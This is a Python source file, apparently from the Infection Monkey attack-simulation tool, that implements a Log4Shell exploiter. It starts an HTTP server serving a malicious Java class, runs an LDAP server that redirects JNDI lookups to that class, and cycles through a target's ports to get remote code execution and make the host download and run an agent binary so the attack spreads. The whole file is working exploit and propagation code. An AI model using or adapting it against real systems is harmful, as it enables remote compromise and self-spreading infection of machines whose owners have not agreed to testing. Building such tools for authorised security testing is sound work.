import logging
from typing import Sequence, Set

from common import OperatingSystem
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.types import AgentID, Event, NetworkPort, SocketAddress
from infection_monkey.exploit import (
    IAgentOTPProvider,
    IHTTPAgentBinaryServerRegistrar,
    ReservationID,
    use_agent_binary,
)
from infection_monkey.exploit.tools import HTTPBytesServer
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.network import TCPPortSelector
from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
from infection_monkey.utils.threading import interruptible_iter

from . import LINUX_EXPLOIT_TEMPLATE_PATH, WINDOWS_EXPLOIT_TEMPLATE_PATH
from .exploit_builder import build_exploit_bytecode
from .ldap_server import LDAPExploitServer
from .log4shell_command_builder import build_log4shell_command
from .log4shell_exploit_client import Log4ShellExploitClient
from .log4shell_options import Log4ShellOptions

logger = logging.getLogger(__name__)


SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT


class Log4ShellExploiter:
    def __init__(
        self,
        agent_id: AgentID,
        log4shell_exploit_client: Log4ShellExploitClient,
        tcp_port_selector: TCPPortSelector,
        http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
        otp_provider: IAgentOTPProvider,
    ):
        self._agent_id = agent_id
        self._log4shell_exploit_client = log4shell_exploit_client
        self._tcp_port_selector = tcp_port_selector
        self._http_agent_binary_server_registrar = http_agent_binary_server_registrar
        self._otp_provider = otp_provider

    def exploit_host(
        self,
        target_host: TargetHost,
        ports_to_try: Set[NetworkPort],
        servers: Sequence[str],
        current_depth: int,
        options: Log4ShellOptions,
        interrupt: Event,
    ) -> ExploiterResult:
        self._host = target_host

        logger.info(f"Starting Log4Shell exploiter for host: {self._host.ip}")

        self._configure_servers()
        if not self._server_configured_successfully():
            msg = (
                "Could not assign ports/interfaces to one or more servers "
                "that are required for the exploit"
            )
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        try:
            logger.debug("Starting the Agent binary server")
            download_ticket = self._http_agent_binary_server_registrar.reserve_download(
                target_host.operating_system, target_host.ip, use_agent_binary
            )
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to start the Agent binary HTTP "
                f"server: {err}"
            )
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        command = build_log4shell_command(
            self._agent_id,
            self._host,
            servers,
            current_depth,
            download_ticket.download_url,
            self._otp_provider.get_otp(),
        )

        # Start HTTP server to serve malicious java class to victim
        try:
            self._start_class_http_server(command)
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to start the "
                f"exploit class HTTP server: {err}"
            )
            logger.exception(msg)

            _clear_agent_binary_reservation(
                self._http_agent_binary_server_registrar, download_ticket.id
            )

            return ExploiterResult(error_message=msg)

        # Start LDAP server to redirect LDAP query to java class server
        try:
            self._start_ldap_server()
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to start the "
                f"LDAP server: {err}"
            )
            logger.exception(msg)

            _clear_agent_binary_reservation(
                self._http_agent_binary_server_registrar, download_ticket.id
            )
            self._stop_exploit_class_http_server()

            return ExploiterResult(error_message=msg)

        try:
            logger.debug(f"Running Log4Shell against host: {self._host.ip}")
            return self._exploit_ports(
                options,
                download_ticket.download_completed,
                interrupt,
                ports_to_try,
                command,
            )
        except Exception as err:
            msg = (
                "An unexpected exception occurred while attempting to exploit the host "
                f'"{self._host.ip}" with the Log4Shell exploiter: {err}'
            )
            logger.exception(msg)
            return ExploiterResult(error_message=msg)
        finally:
            _clear_agent_binary_reservation(
                self._http_agent_binary_server_registrar, download_ticket.id
            )
            self._stop_exploit_class_http_server()
            self._stop_ldap_server()

    def _configure_servers(self):
        self._ldap_port = self._tcp_port_selector.get_free_tcp_port()

        self._class_http_server_ip = get_interface_to_target(str(self._host.ip))
        self._class_http_server_port = self._tcp_port_selector.get_free_tcp_port()

        self._ldap_server = None
        self._exploit_class_http_server = None

    def _server_configured_successfully(self) -> bool:
        # Checking these beforehand so they don't cause unexpected exceptions
        # when trying to start the servers, and so that the Agent binary server
        # isn't started for nothing

        return not any(
            [
                value is None
                for value in [
                    self._ldap_port,
                    self._class_http_server_ip,
                    self._class_http_server_port,
                ]
            ]
        )

    def _start_class_http_server(self, command: str):
        java_class = self._build_java_class(command)
        self._exploit_class_http_server = HTTPBytesServer(
            SocketAddress(ip=self._class_http_server_ip, port=self._class_http_server_port),
            java_class,
        )
        self._exploit_class_http_server.start()

    def _build_java_class(self, exploit_command: str) -> bytes:
        if OperatingSystem.LINUX == self._host.operating_system:
            return build_exploit_bytecode(exploit_command, LINUX_EXPLOIT_TEMPLATE_PATH)
        else:
            return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)

    def _start_ldap_server(self):
        self._ldap_server = LDAPExploitServer(
            ldap_server_port=self._ldap_port,  # type: ignore [arg-type]
            http_server_ip=self._class_http_server_ip,  # type: ignore [arg-type]
            http_server_port=self._class_http_server_port,  # type: ignore [arg-type]
            storage_dir=get_monkey_dir_path(),
        )
        self._ldap_server.run()

    def _exploit_ports(
        self,
        options: Log4ShellOptions,
        agent_binary_downloaded: Event,
        interrupt: Event,
        ports_to_try: Set[NetworkPort],
        command: str,
    ) -> ExploiterResult:
        exploit_result = ExploiterResult()

        for port in interruptible_iter(ports_to_try, interrupt):
            logger.debug(f"Attempting to exploit host: {self._host.ip} on port: {port}")
            (
                exploit_result.exploitation_success,
                exploit_result.propagation_success,
            ) = self._log4shell_exploit_client.exploit(
                target_host=self._host,
                options=options,
                ldap_port=self._ldap_port,
                agent_binary_downloaded=agent_binary_downloaded,
                exploit_class_downloaded=self._exploit_class_http_server.bytes_downloaded,
                service_port=port,
                interrupt=interrupt,
            )

            if exploit_result.exploitation_success is True:
                break

        return exploit_result

    def _stop_exploit_class_http_server(self):
        try:
            logger.debug("Stopping the exploit class HTTP server")
            self._exploit_class_http_server.stop(  # type: ignore [union-attr]
                SERVER_SHUTDOWN_TIMEOUT
            )
        except Exception:
            logger.exception(
                "An unexpected error occurred while stopping the exploit class HTTP server"
            )

    def _stop_ldap_server(self):
        try:
            logger.debug("Stopping the LDAP server")
            self._ldap_server.stop(SERVER_SHUTDOWN_TIMEOUT)  # type: ignore [union-attr]
        except Exception:
            logger.exception("An unexpected error occurred while stopping the LDAP server")


def _clear_agent_binary_reservation(
    http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
    reservation_id: ReservationID,
):
    try:
        logger.debug("Clearing the Agent binary download reservation")
        http_agent_binary_server_registrar.clear_reservation(reservation_id)
    except Exception:
        logger.exception(
            "An unexpected error occurred while clearing the Agent binary download reservation"
        )
